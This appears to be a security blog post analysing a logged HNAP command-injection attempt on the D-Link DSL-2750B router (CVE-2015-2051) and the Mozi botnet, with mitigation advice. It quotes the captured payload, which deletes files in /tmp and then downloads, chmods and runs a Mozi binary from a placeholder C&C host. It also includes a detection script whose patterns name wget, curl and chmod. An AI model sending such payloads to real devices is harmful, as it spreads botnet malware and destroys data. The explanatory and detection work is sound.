D-Link DSL2750B Command Injection

(Command injection attack attempt against the D-Link DSL2750B)

(CVE-2015-2051)



REFERENCE LINK-> DSL-2750B Wireless N300 ADSL2+ Modem Router | D-Link UK (dlink.com)

----------------------------------------------------------------------------------------------------

- [Information] -


D-Link Corporation: a Taiwanese company that makes network products
(Wi-Fi routers, switches, hotspot devices, webcams, etc.).


It was established in 1986 under the name 'Datex Systems INC'

and changed its name to 'D-Link' in 1992.

It started as a simple LAN card manufacturer and now sells pretty much every kind of network product, including IoT products.


This maker is one of the very few that keeps trying to
build a VPN client function into ordinary consumer Internet modems.
(ex: iptime products only focus on the VPN server function)
If you want to find an Internet modem that has a VPN client function
priced under 50,000,
it will be really hard to find an alternative option except a D-Link product.

(In short: cost-effective network products)

Recently it also looks like they are trying to provide a VPN server function through firmware updates.


What is DSL -> Digital subscriber line

A family of technologies that are used to transmit digital data over telephone lines.

In telecommunications marketing, the term DSL is widely understood to mean asymmetric digital subscriber line, the most commonly installed DSL technology, for Internet access.



---------------------------------------------------------------------------------------------------

- [Attack command] -

HTTP REQUEST HEADER (as detected):

    POST /HNAP1/ HTTP/1.0
    HOST: ***.***.***.***:80
    CONTENT-TYPE: TEXT/XML; CHARSET="UTF-8"     <- UTF-8 is the most well-known Unicode encoding type.
    SOAPACTION: HxxP://PURENETWORKS.COM/HNAP1/
    CD /TMP && RM -RF *
    WGET HTTP://BAD_GUY:55717/MOZI.M  CHMOD 777 /TMP/MOZI.M  /TMP/MOZI.M
                 (C&C)  (example port)


When you check the command detected here,
it's interesting to see that the requested HTTP header is pretty simple (POST /HNAP1/);
once that request reaches the device, the rest of the work is done through the 'SOAPAction' header.


HNAP1 -> D-Link HNAP (Home Network Management Protocol)
                      (based on the SOAP protocol)
            HxxP://PURENETWORKS.COM/HNAP1/ <- by sending requests with this SOAPAction, attackers can bypass the authentication process
                                              and attempt a denial-of-service or backdoor attack.
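A detection-side check for the HNAP1/SOAPAction pattern described above, added here as an example (it is not code from the original post or from D-Link): it parses a raw HTTP request and flags a POST to /HNAP1/ whose SOAPAction value is not a plain purenetworks.com/HNAP1/<Action> URI, or carries shell metacharacters or a download/execute command. The two sample requests, the 192.0.2.1 address and the BAD_GUY_PLACEHOLDER host are constructed, and the "one alphanumeric action name" rule for legitimate HNAP calls is an assumption.

```python
import re

# Constructed sample requests (not real captures); 192.0.2.1 is a
# documentation address and BAD_GUY_PLACEHOLDER stands in for the C&C host.
BENIGN_REQUEST = (
    "POST /HNAP1/ HTTP/1.0\r\n"
    "Host: 192.0.2.1:80\r\n"
    'Content-Type: text/xml; charset="utf-8"\r\n'
    'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"\r\n\r\n'
)
INJECTED_REQUEST = (
    "POST /HNAP1/ HTTP/1.0\r\n"
    "Host: 192.0.2.1:80\r\n"
    'Content-Type: text/xml; charset="utf-8"\r\n'
    "SOAPAction: http://purenetworks.com/HNAP1/ cd /tmp && "
    "wget http://BAD_GUY_PLACEHOLDER:55717/MOZI.M\r\n\r\n"
)

# Assumption: a legitimate HNAP SOAPAction is the purenetworks.com/HNAP1/ URI
# followed by one action name made of letters, digits or underscores.
HNAP_ACTION_RE = re.compile(r'^"?http://purenetworks\.com/HNAP1/(\w*)"?$', re.I)
# Shell metacharacters or a download/execute command never belong in that header.
SUSPICIOUS_RE = re.compile(r"[;&|`$<>(){}]|\s(wget|curl|tftp|chmod|sh)\b", re.I)


def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers dict with lowercased names)."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    parts = lines[0].split(" ")
    method, path = parts[0], (parts[1] if len(parts) > 1 else "")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def inspect_hnap_request(raw):
    """Return findings for one raw request; an empty list means nothing was flagged."""
    method, path, headers = parse_request(raw)
    if method.upper() != "POST" or not path.upper().startswith("/HNAP1"):
        return []  # only HNAP POSTs are in scope here
    action = headers.get("soapaction", "")
    findings = []
    if not HNAP_ACTION_RE.match(action):
        findings.append("SOAPAction is not a plain purenetworks.com/HNAP1/<Action> URI")
    if SUSPICIOUS_RE.search(action):
        findings.append("shell metacharacters or download/exec command in SOAPAction")
    return findings
```

Feeding each logged request to inspect_hnap_request() gives an empty list for a normal HNAP call and two findings for the injected one; a real deployment would also inspect the XML body, since the page's capture shows the commands following the SOAPAction line.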

SOAP (Simple Object Access Protocol)
-> The protocol that sends XML-based messages across a computer network over well-known protocols such as HTTP, HTTPS and SMTP.
It can access objects very easily.

This can be the basis for sending simple messages within a web service.


SOAP ACTION -> It isn't a 'real' URL.
                        The URL is part of the HTTP request that is being performed on the service address.
It specifies which process or program needs to be called when a request is sent by the service requester, using the relative path of that process/program.

When (for example) the function 'insert' is called,

this function is called against the 'service address',

https://demo1.service-now.com/incident.do?SOAP (You can find this URL in the last part of the WSDL).


The call itself is just a regular HTTP request,

and one of the HTTP headers within that request has the name "SOAPAction", with a value of "http://www.service-now.com/incident/insert".


This action is a way for the provider to route the request the appropriate way,

but has absolutely no bearing on the actual URL being used for the HTTP request.

Some other providers do not use the SOAPAction at all, or use a relative path instead of a full URL.

REFERENCE LINK-> Solved: Difference between SOAP action and SOAP endpoint - ServiceNow Community


[Type of Bot]

Mirai -> IoT botnet malware.

Mozi -> IoT botnet malware (a variant of Mirai).

The source code has actually been published openly, so attackers can freely reuse it for attacks.

It is specialised in attacking pretty much all IoT devices that run Linux inside, like Wi-Fi routers, CCTV, printers, etc.; it infects servers or devices and
turns them into a zombie PC or device.

REFERENCE LINK-> [Current affairs terms] Latest terms to know in 2022 (Mozi botnet / DAO / last look / Nusantara / office-free / E-flation / Plum Book) (jobkorea.co.kr)

REFERENCE LINK-> IoT malware 'Mozi' still running rampant... distribution sites up 30% (inews24.com)

When enough of these zombie PCs have been gathered
to be used as one organised 'corps',     ---------------> that group is called a 'Botnet'.


---------------------------------------------------------------------------------------------------

- [Solution] -

- When using a D-Link DSL2750B, update the firmware to the latest version.

- Change passwords to complex ones.

(According to the Palo Alto researchers, it is very common for victims of this vulnerability to have been found using very simple passwords, or even the default one.)


